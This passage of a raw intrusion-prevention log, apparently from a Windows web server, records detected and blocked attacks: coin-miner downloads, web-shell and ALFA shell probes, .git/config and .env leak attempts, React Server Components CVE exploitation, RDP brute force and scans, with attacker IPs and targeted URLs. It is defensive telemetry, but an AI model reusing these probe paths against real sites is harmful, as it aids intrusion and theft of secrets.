TI2MUJBRi0wMDVDLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiJFN0IzMTU5MS05NDcxLTExRjEtQTQwQy04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG0wNjYxN2MxNy0wNWFiLTQ1ODEtYTgxMC00YmY2ZTliOWIzMmIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjozMDcxNiwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA0MzQzMTQxOSwidWlkIjoiMDQ2ODJBQjUtMDAyNy1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000e84c	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770056983.1392819881439208984375			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
00000384	01dc94726187b240	000000ce	0000000f	164a8367	f999e14a	00000002	00000002	00000001	01dc94723a7e5020	01dc94723a7e5020	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjNBN0IyQTVFLTk0NzItMTFGMS04NkM1LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	0000a852	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://bsm.com.vn/shell.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000215	01dc9473721a9320	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc94734d5d228d	01dc94734d5d228d	00000001	00000000	Active Response that started at 2/3/2026 1:29:45 AM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
0000039f	01dc9473c528b0e3	000000ce	0000000f	164a8367	ae287c4f	00000002	00000002	00000001	01dc9473a03191cd	01dc9473a03191cd	00000001	00000114	[SID: 33946] Audit: Xdebug Activation Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkEwMkU1QjkzLTk0NzMtMTFGMS1BQ0NDLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM5NDYsIm5hbWUiOiJBdWRpdDogWGRlYnVnIEFjdGl2YXRpb24gQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000849a	00010000	00000002	00000002	0000a52a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Xdebug Activation Attempt	http://103.131.74.22:80/?XDEBUG_SESSION_START=phpstorm			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b5	01dc94748caaee25	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc947465cf72c1	01dc947465cf72c1	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjY1Q0M0Q0JFLTk0NzQtMTFGMS05MUFGLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000b72e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://ku1720.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b6	01dc94768fd0243a	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc94766a3fac6c	01dc94766a3fac6c	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjZBM0Y5ODc3LTk0NzYtMTFGMS1CODRCLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000c368	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://manager.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b9	01dc9479229676bf	000000ce	0000000f	164a8367	0f15cb55	00000002	00000002	00000001	01dc9478fe9545c6	01dc9478fe9545c6	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkZFOTIyMDEyLTk0NzgtMTFGMS1BRjQwLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000a9d3	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://tienganhmrvinh.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b2	01dc947a0497333e	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc9479dfa31c5a	01dc9479dfa31c5a	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkRGOUZFNjNBLTk0NzktMTFGMS04REE0LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000bafe	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://mvn.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc947a78e0d534	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc947a763ba9eb	01dc947bdbdc65eb	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 2:31:00 AM to 2/3/2026 2:41:00 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc947a9a24472b	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc947a75d2c2a7	01dc947a75d2c2a7	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQyOTAwLCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDYwNTkxMDkzLCJ1aWQiOiIwREExREU3Qy0wMDZELUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI3NUNGRUYzMS05NDdBLTExRjEtOEFBMi04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG0wNjYxN2MxNy0wNWFiLTQ1ODEtYTgxMC00YmY2ZTliOWIzMmIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjozMDcxNiwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA0MzQzMTQxOSwidWlkIjoiMDQ2ODJBQjUtMDAyNy1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000f481	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770060657.6905999183654785156250			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
0000039e	01dc947ae9e002d4	000000ce	0000000f	164a8367	37383a02	00000002	00000002	00000001	01dc947ac4686a56	01dc947ac4686a56	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkM0Njc5NjRGLTk0N0EtMTFGMS1BRDk5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000d002	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://miracruises.com/ALFA_DATA/alfacgiapi/perl.alfa			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a3	01dc947ae9e002d4	000000ce	0000000f	164a8367	37383a02	00000002	00000002	00000001	01dc947ac46acaf4	01dc947ac46acaf4	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkM0NjdBNjRFLTk0N0EtMTFGMS1BRDk5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000e334	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://miracruises.com/wp-content/themes/seotheme/db.php?u			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000380	01dc947ae9e002d4	000000ce	0000000f	164a8367	37383a02	00000002	00000002	00000001	01dc947ac476b67a	01dc947ac476b67a	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkM0NzVFMjcxLTk0N0EtMTFGMS1BRDlGLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000d7f5	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://miracruises.com/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000213	01dc947bcf5efbd6	000000cf	00000007	164a8367	d1938ec1	00000001	00000000	00000001	01dc947bcc49c9f3	01dc947d31ea85f3	00000001	00000000	The client will block traffic from IP address 193.142.147.209 for the next 600 seconds (from 2/3/2026 2:40:34 AM to 2/3/2026 2:50:34 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000403	01dc947bf0ade8db	000000ce	00000003	164a8367	d1938ec1	00000002	00000001	00000001	01dc947bcc0e2eb5	01dc947bcc0e2eb5	00000001	00000158	[SID: 35300] Web Attack: Meta React Server Components CVE-2025-55182 2 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNDMEQ1QUE5LTk0N0ItMTFGMS1CQTJELTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMjUtNTUxODIiLCJpZCI6MzUzMDAsIm5hbWUiOiJXZWIgQXR0YWNrOiBNZXRhIFJlYWN0IFNlcnZlciBDb21wb25lbnRzIENWRS0yMDI1LTU1MTgyIDIiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000089e4	00010000	00000002	00000002	00000854	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Meta React Server Components CVE-2025-55182 2	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003fb	01dc947bf0ade8db	000000ce	00000003	164a8367	d1938ec1	00000002	00000001	00000001	01dc947bcc1091af	01dc947bcc1091af	00000001	00000154	[SID: 35256] Web Attack: Meta React Server Components CVE-2025-55182 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNDMEQ1QUE4LTk0N0ItMTFGMS1CQTJELTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMjUtNTUxODIiLCJpZCI6MzUyNTYsIm5hbWUiOiJXZWIgQXR0YWNrOiBNZXRhIFJlYWN0IFNlcnZlciBDb21wb25lbnRzIENWRS0yMDI1LTU1MTgyIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000089b8	00010001	00000002	00000002	00000854	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Meta React Server Components CVE-2025-55182	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a3	01dc947bf0ade8db	000000ce	00000003	164a8367	d1938ec1	00000002	00000001	00000001	01dc947bcc12f402	01dc947bcc12f402	00000001	0000011c	[SID: 35273] Web Attack: Malicious Payload Upload 40 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNDMEQ1QUE3LTk0N0ItMTFGMS1CQTJELTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzUyNzMsIm5hbWUiOiJXZWIgQXR0YWNrOiBNYWxpY2lvdXMgUGF5bG9hZCBVcGxvYWQgNDAiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000089c9	00010002	00000002	00000002	00000854	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Malicious Payload Upload 40	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000215	01dc947c014fad1c	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc947bdc0f9f6d	01dc947bdc0f9f6d	00000001	00000000	Active Response that started at 2/3/2026 2:31:00 AM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000211	01dc947c2fe011d0	000000cf	00000007	164a8367	5b79652e	00000001	00000000	00000001	01dc947c2e8a4308	01dc947d942aff08	00000001	00000000	The client will block traffic from IP address 46.101.121.91 for the next 600 seconds (from 2/3/2026 2:43:19 AM to 2/3/2026 2:53:19 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000363	01dc947c546476a2	000000ce	0000000f	164a8367	5b79652e	00000002	00000002	00000001	01dc947c2e36cfe0	01dc947c2e36cfe0	00000001	00000110	[SID: 33389] Audit: RDP Bruteforce Attempt 3 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjJFMzYwQkQwLTk0N0MtMTFGMS05NTU5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzODksIm5hbWUiOiJBdWRpdDogUkRQIEJydXRlZm9yY2UgQXR0ZW1wdCAzIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		0000826d	00010001	00000002	00000002	00004889	000001bb	00000000000000000000000000000000	00000000000000000000000000000000	Audit: RDP Bruteforce Attempt 3				14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000036b	01dc947c546476a2	000000ce	00000003	164a8367	5b79652e	00000002	00000001	00000001	01dc947c2e393270	01dc947c2e393270	00000001	00000110	[SID: 34618] Attack: Nmap RDP Scan Attempt attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjJFMzYwQkNGLTk0N0MtMTFGMS05NTU5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzQ2MTgsIm5hbWUiOiJBdHRhY2s6IE5tYXAgUkRQIFNjYW4gQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000873a	00010000	00000002	00000002	00004889	000001bb	00000000000000000000000000000000	00000000000000000000000000000000	Attack: Nmap RDP Scan Attempt				14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000217	01dc947d57bc1960	000000d3	0000000f	164a8367	d1938ec1	00000001	00000000	00000000	01dc947d329ce036	01dc947d329ce036	00000001	00000000	Active Response that started at 2/3/2026 2:40:34 AM is disengaged. The traffic from IP address 193.142.147.209 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000215	01dc947dbb8340f2	000000d3	0000000f	164a8367	5b79652e	00000001	00000000	00000000	01dc947d94d23a45	01dc947d94d23a45	00000001	00000000	Active Response that started at 2/3/2026 2:43:19 AM is disengaged. The traffic from IP address 46.101.121.91 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
